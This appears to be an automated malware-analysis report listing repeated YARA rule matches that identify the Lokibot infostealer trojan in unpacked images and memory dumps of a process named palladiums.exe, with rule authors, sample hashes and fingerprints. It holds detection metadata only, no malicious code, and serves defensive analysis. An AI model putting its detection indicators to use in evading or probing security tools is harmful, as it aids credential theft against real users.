Source: 30.2.palladiums.exe.38b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 30.2.palladiums.exe.38b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 30.2.palladiums.exe.38b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 30.2.palladiums.exe.38b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 20.2.palladiums.exe.3cf0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 20.2.palladiums.exe.3cf0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 20.2.palladiums.exe.3cf0000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 20.2.palladiums.exe.3cf0000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.palladiums.exe.37a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 2.2.palladiums.exe.37a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.palladiums.exe.37a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.palladiums.exe.37a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.palladiums.exe.37a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 33.2.palladiums.exe.1670000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 33.2.palladiums.exe.1670000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 33.2.palladiums.exe.1670000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 33.2.palladiums.exe.1670000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000025.00000002.2407205454.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.2227380361.0000000000F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2156578917.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.2179820795.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
